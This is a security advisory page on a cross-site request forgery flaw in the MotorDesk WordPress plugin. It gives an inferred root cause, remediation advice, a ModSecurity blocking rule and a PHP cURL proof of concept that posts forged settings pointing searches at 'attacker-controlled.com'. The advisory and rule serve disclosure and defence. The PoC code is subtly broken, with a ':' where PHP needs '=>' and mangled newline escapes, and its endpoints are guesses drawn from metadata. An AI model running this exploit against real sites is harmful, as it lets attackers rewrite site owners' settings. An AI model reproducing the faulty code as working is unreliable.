Atomic Edge analysis of CVE-2026-9724 (metadata-based):
This vulnerability is a Cross-Site Request Forgery (CSRF) in the MotorDesk plugin for WordPress, affecting all versions up to and including 1.1.2. An unauthenticated attacker can trick a site administrator into performing an action that modifies the plugin’s configuration settings, specifically the search page URI and custom template directory path. The CVSS score of 4.3 reflects the low impact on integrity with no direct data exposure or privilege escalation.
Root Cause:
Based on the CWE and description, the root cause is the absence of nonce validation in the `motordesk_admin_home` function. In WordPress admin handlers, a nonce is a security token that ensures a request originated from the intended user’s session. Without it, a crafted request can be submitted to any endpoint that calls this function. Atomic Edge analysis infers this conclusion from the metadata, as no code diff is available to confirm the exact location. The function likely processes settings updates via a POST request and lacks a check like `wp_verify_nonce( $_REQUEST[‘_wpnonce’], ‘motordesk_settings’ )`.
Exploitation:
An attacker can exploit this vulnerability by crafting a malicious HTML page that submits a POST request to the WordPress admin URL where the `motordesk_admin_home` function is hooked. The typical endpoint is a WordPress admin menu page. The attack requires social engineering: the attacker must trick a logged-in administrator into viewing the malicious page and performing an action (e.g., clicking a link or loading a page with an auto-submitted form). The request includes parameters for the search page URI and custom template directory path. If successful, the attacker can change these settings to arbitrary values, such as redirecting searches to a malicious site or loading templates from an attacker-controlled server.
Remediation:
The fix must add nonce validation to the `motordesk_admin_home` function. Atomic Edge research recommends using `check_admin_referer( ‘motordesk_settings’ )` or `wp_verify_nonce()` at the start of the function. The nonce should be included in the form as a hidden field using `wp_nonce_field( ‘motordesk_settings’ )`. Additionally, output escaping and input sanitization should be applied to the settings values before saving them to the database.
Impact:
If exploited, an attacker can modify the plugin’s configuration settings. This could lead to defacement, redirection of search results to external malicious sites, or inclusion of arbitrary template files if the custom template directory path is used without further validation. In the worst case, if the plugin loads templates from the custom path, an attacker could achieve remote code execution by pointing it to a directory containing malicious PHP files. However, based on the CVSS vector (no availability impact), the attack likely only affects integrity minimally, such as changing a search page URI.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-9724 (metadata-based)
# Block CSRF exploitation of MotorDesk settings update via admin-post handler
# This rule blocks requests that lack a valid nonce for the motordesk_save_settings action
SecRule REQUEST_URI "@streq /wp-admin/admin-post.php"
"id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-9724 CSRF attempt to MotorDesk settings update',severity:'CRITICAL',tag:'CVE-2026-9724',tag:'wordpress',tag:'motordesk'"
SecRule ARGS_POST:action "@streq motordesk_save_settings" "chain"
SecRule ARGS_POST:_wpnonce "@rx ^$" "t:removeNulls"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-9724 - MotorDesk <= 1.1.2 - Cross-Site Request Forgery to Settings Update
/**
* This PHP script demonstrates a CSRF attack against the MotorDesk plugin.
* It sends a forged POST request to change plugin settings.
* The target admin URL where motordesk_admin_home processes settings is inferred
* as /wp-admin/admin-post.php?action=motordesk_save_settings or the plugin's menu page
* under /wp-admin/admin.php?page=motordesk. This PoC uses the admin-post handler pattern.
* Assumption: The plugin registers an admin action hook for settings update.
*/
// Configuration
$target_url = 'http://example.com/wp-admin/admin-post.php'; // Change to target WordPress admin
$action_param = 'motordesk_save_settings'; // Inferred admin action
// Plugin settings parameters (based on description: search_page_uri, custom_template_directory)
$payload = array(
'action' => $action_param,
'search_page_uri' => 'http://attacker-controlled.com/malicious-redirect',
'custom_template_dir' => '/var/www/html/wp-content/uploads/malicious_templates/',
'_wp_http_referer' : '/wp-admin/admin.php?page=motordesk', // Spoof referer
// No nonce parameter included, as the vulnerability exploits missing validation
);
// Initiate cURL request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// Opt into cookies to simulate admin session (victim must be logged-in)
// In a real attack, the attacker does not supply cookies; the victim's browser does.
// This script is for testing purposes: you must already have an admin session cookie.
// For actual exploitation, create an HTML form with auto-submit JavaScript.
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_logged_in_xxx=VICTIM_COOKIE; PHPSESSID=xxx');
// Optional: spoof referer header
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Referer: ' . $target_url));
$response = curl_exec($ch);
if (curl_error($ch)) {
echo 'cURL error: ' . curl_error($ch) . "n";
}
curl_close($ch);
echo "CSRF attack payload sent to $target_urln";
echo "Check if settings were updated by visiting plugin configuration page.n";
?>
